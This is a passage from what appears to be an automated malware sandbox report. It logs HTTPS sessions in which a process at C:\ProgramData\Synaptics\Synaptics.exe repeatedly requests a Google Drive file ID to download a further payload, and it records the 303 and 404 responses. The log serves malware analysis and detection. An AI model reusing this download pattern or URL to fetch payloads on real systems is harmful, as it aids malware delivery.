                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gK7g6gVI5DBWWKIEh2PX7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:06 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:06 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 56 48 62 54 6b 59 76 63 52 4b 4a 75 41 72 67 61 41 5a 72 6d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="FVHbTkYvcRKJuArgaAZrmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:06 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                49192.168.2.449899142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:05 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:06 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7bezbTf4YVUFig8YrGSvVMg-rK0mW1vmgQStP9ZrY1GOZcpiF6UXV4KCtg_NjvuF2a
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:06 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-d0vr2e4qqysaCwp9X1Q4dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:06 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:06 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 5a 62 49 36 49 38 58 45 4d 59 4f 54 32 61 31 34 4d 37 69 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="JZbI6I8XEMYOT2a14M7img">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:06 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                50192.168.2.449918142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:08 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:09 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-WEvI9hWPNleHDzPxJSOQZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                51192.168.2.449919142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:08 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:09 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-NuFXMDsNLAWKXlWj_7PeLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                52192.168.2.449938142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:12 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:13 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ij3ySIsX3v7DM-djI41caA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                53192.168.2.449937142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:12 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:13 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Gq1sVW4kIK_9vaFpk8WPlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                54192.168.2.449954142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:17 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-w3twSt64Fpwmp3uHH5bL7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                55192.168.2.449955142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:17 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Cg1eCcJxqHs5tvRnpBkgCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                56192.168.2.449973142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:21 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0QhEy_SD9F5WLySTmSoieg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                57192.168.2.449974142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:20 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:21 GMT
